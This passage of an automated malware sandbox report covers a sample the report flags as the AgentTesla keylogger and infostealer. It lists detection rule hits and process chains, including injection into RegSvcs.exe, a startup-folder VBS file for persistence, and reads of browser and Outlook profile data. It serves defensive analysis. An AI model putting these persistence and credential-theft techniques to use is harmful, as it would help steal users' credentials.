                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060EB3183_2_060EB318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E77703_2_060E7770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060EE4783_2_060EE478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E00403_2_060E0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060E59C03_2_060E59C0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7DBB55_2_00C7DBB5
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CD804A5_2_00CD804A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5E0605_2_00C5E060
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C641405_2_00C64140
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C724055_2_00C72405
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C865225_2_00C86522
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CD06655_2_00CD0665
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C8267E5_2_00C8267E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C668435_2_00C66843
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5E8005_2_00C5E800
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7283A5_2_00C7283A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C889DF5_2_00C889DF
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CD0AE25_2_00CD0AE2
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C86A945_2_00C86A94
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C68A0E5_2_00C68A0E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CAEB075_2_00CAEB07
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CB8B135_2_00CB8B13
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7CD615_2_00C7CD61
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C870065_2_00C87006
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C631905_2_00C63190
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C6710E5_2_00C6710E
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C512875_2_00C51287
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C733C75_2_00C733C7
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7F4195_2_00C7F419
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C716C45_2_00C716C4
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C656805_2_00C65680
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C658C05_2_00C658C0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C778D35_2_00C778D3
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C71BB85_2_00C71BB8
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C89D055_2_00C89D05
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C5FE405_2_00C5FE40
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C71FD05_2_00C71FD0
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C7BFE65_2_00C7BFE6
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_017CF4F05_2_017CF4F0
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: String function: 00DD7F41 appears 35 times
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: String function: 00DF0D27 appears 70 times
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: String function: 00DF8B40 appears 42 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C55A64 appears 50 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C59A20 appears 42 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C81B90 appears 58 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C57F41 appears 70 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C7313D appears 42 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C70D27 appears 140 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C78B40 appears 84 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C73A0B appears 38 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C51D35 appears 38 times
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: String function: 00C79FB5 appears 46 times
                    Source: toIuQILmr1.exeStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: outvaunts.exe.0.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
                    Source: toIuQILmr1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3A2D5 GetLastError,FormatMessageW,0_2_00E3A2D5
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E28713 AdjustTokenPrivileges,CloseHandle,0_2_00E28713
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E28CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E28CC3
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CA8713 AdjustTokenPrivileges,CloseHandle,2_2_00CA8713
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CA8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00CA8CC3
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CA8713 AdjustTokenPrivileges,CloseHandle,5_2_00CA8713
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CA8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00CA8CC3
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E3B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E3B59E
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E4F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E4F121
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E486D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00E486D0
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00DD4FE9
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeFile created: C:\Users\user\AppData\Local\kinematicalJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeFile created: C:\Users\user\AppData\Local\Temp\autFF64.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: toIuQILmr1.exeVirustotal: Detection: 76%
                    Source: toIuQILmr1.exeReversingLabs: Detection: 71%
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeFile read: C:\Users\user\Desktop\toIuQILmr1.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\toIuQILmr1.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeProcess created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\toIuQILmr1.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe"
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeProcess created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\Desktop\toIuQILmr1.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\toIuQILmr1.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\kinematical\outvaunts.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\kinematical\outvaunts.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: outvaunts.exe, 00000002.00000003.2063899010.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000002.00000003.2065002937.0000000003810000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182637318.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000005.00000003.2182943669.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00EE8070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00EE8070
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF8B85 push ecx; ret 0_2_00DF8B98
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C685D8 push eax; retf 0000h2_2_00C685DB
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C78B85 push ecx; ret 2_2_00C78B98
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C685D8 push eax; retf 0000h5_2_00C685DB
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C78B85 push ecx; ret 5_2_00C78B98
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeFile created: C:\Users\user\AppData\Local\kinematical\outvaunts.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops VBS files to the startup folder
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbsJump to dropped file
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbsJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbsJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DD4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DD4A35
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00E555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E555FD
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00C54A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00C54A35
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 2_2_00CD55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00CD55FD
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00C54A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00C54A35
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeCode function: 5_2_00CD55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00CD55FD
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeCode function: 0_2_00DF33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00DF33C7
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\toIuQILmr1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
